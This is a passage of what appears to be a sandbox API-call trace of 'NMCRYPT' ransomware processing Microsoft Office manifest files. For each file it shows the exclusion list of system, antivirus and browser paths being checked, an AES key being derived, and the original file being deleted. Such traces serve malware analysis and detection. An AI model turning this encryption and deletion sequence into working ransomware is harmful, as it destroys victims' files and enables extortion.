pszSpec="*.bat") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*.ini") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*.msi") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*.scf") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*pagefile.sys*") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*NTUSER.DAT*") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*AppData*") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*\\winrar\\*") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*\\java\\*") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0173.456] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*\\windows\\*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*\\ESET\\*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVG\\*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVIRA\\*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*Atheros*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*Realtek*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*bootmgr*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*CONFIG.SYS*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*IO.SYS*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*MSDOS.SYS*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*NTDETECT.COM*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*ntldr*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*chrome*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*opera*") returned 0 [0173.457] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*firefox*") returned 0 [0173.457] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml", pszSpec="*") returned 1 [0173.457] strlen (_Str="NMoreira") returned 0x8 [0173.458] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0173.458] CryptHashData (hHash=0x9ad838, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.458] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad4b8) returned 1 [0173.458] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0173.459] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0173.459] wcslen (_String="\\\\?\\") returned 0x4 [0173.554] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 1 [0173.555] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0000-1000-0000000ff1ce.xml")) returned 1 [0173.576] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0173.576] wcslen (_String="OK") returned 0x2 [0173.576] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.576] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.576] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0173.576] CryptDestroyHash (hHash=0x9ad838) returned 1 [0173.576] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*NMCRYPT") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*Recovers your files.html") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*.exe") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*.dll") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*.lnk") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*.bat") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*.ini") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*.msi") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*.scf") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*pagefile.sys*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*NTUSER.DAT*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*AppData*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*\\winrar\\*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*\\java\\*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*\\windows\\*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*\\ESET\\*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVG\\*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVIRA\\*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*Atheros*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*Realtek*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*bootmgr*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*CONFIG.SYS*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*IO.SYS*") returned 0 [0173.576] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*MSDOS.SYS*") returned 0 [0173.577] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*NTDETECT.COM*") returned 0 [0173.577] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*ntldr*") returned 0 [0173.577] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*chrome*") returned 0 [0173.577] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*opera*") returned 0 [0173.577] PathMatchSpecW (pszFile="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*firefox*") returned 0 [0173.577] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml", pszSpec="*") returned 1 [0173.577] strlen (_Str="NMoreira") returned 0x8 [0173.578] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0173.578] CryptHashData (hHash=0x9ad378, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.578] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad578) returned 1 [0173.578] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0173.578] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0173.578] wcslen (_String="\\\\?\\") returned 0x4 [0173.581] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 1 [0173.581] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml")) returned 1 [0173.582] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0173.582] wcslen (_String="OK") returned 0x2 [0173.582] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.582] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.582] CryptDestroyKey (hKey=0x9ad578) returned 1 [0173.582] CryptDestroyHash (hHash=0x9ad378) returned 1 [0173.582] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*NMCRYPT") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*Recovers your files.html") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*.exe") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*.dll") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*.lnk") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*.bat") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*.ini") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*.msi") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*.scf") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*pagefile.sys*") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*NTUSER.DAT*") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*AppData*") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*\\winrar\\*") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*\\java\\*") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0173.582] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*\\windows\\*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*\\ESET\\*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVG\\*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVIRA\\*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*Atheros*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*Realtek*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*bootmgr*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*CONFIG.SYS*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*IO.SYS*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*MSDOS.SYS*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*NTDETECT.COM*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*ntldr*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*chrome*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*opera*") returned 0 [0173.583] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*firefox*") returned 0 [0173.583] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", pszSpec="*") returned 1 [0173.583] strlen (_Str="NMoreira") returned 0x8 [0173.585] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0173.585] CryptHashData (hHash=0x9ad338, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.585] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad1f8) returned 1 [0173.585] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0173.585] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0173.585] wcslen (_String="\\\\?\\") returned 0x4 [0173.670] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 1 [0173.670] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml")) returned 1 [0173.672] CryptDestroyKey (hKey=0x9ad238) returned 1 [0173.672] wcslen (_String="OK") returned 0x2 [0173.672] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.672] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.672] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0173.672] CryptDestroyHash (hHash=0x9ad338) returned 1 [0173.672] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*NMCRYPT") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*Recovers your files.html") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*.exe") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*.dll") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*.lnk") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*.bat") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*.ini") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*.msi") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*.scf") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*pagefile.sys*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*NTUSER.DAT*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*AppData*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*\\winrar\\*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*\\java\\*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*\\windows\\*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*\\ESET\\*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVG\\*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVIRA\\*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*Atheros*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*Realtek*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*bootmgr*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*CONFIG.SYS*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*IO.SYS*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*MSDOS.SYS*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*NTDETECT.COM*") returned 0 [0173.672] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*ntldr*") returned 0 [0173.673] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*chrome*") returned 0 [0173.673] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*opera*") returned 0 [0173.673] PathMatchSpecW (pszFile="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*firefox*") returned 0 [0173.673] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", pszSpec="*") returned 1 [0173.673] strlen (_Str="NMoreira") returned 0x8 [0173.675] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0173.675] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.676] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad878) returned 1 [0173.676] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0173.676] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0173.676] wcslen (_String="\\\\?\\") returned 0x4 [0173.678] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 1 [0173.678] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml")) returned 1 [0173.679] CryptDestroyKey (hKey=0x9ad478) returned 1 [0173.679] wcslen (_String="OK") returned 0x2 [0173.679] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.679] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0173.679] CryptDestroyKey (hKey=0x9ad878) returned 1 [0173.679] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0173.679] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*NMCRYPT") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*Recovers your files.html") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*.exe") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*.dll") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*.lnk") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*.bat") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*.ini") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*.msi") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*.scf") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*pagefile.sys*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*NTUSER.DAT*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*AppData*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*\\winrar\\*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*\\java\\*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*\\windows\\*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*\\ESET\\*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVG\\*") returned 0 [0173.680] PathMatchSpecW 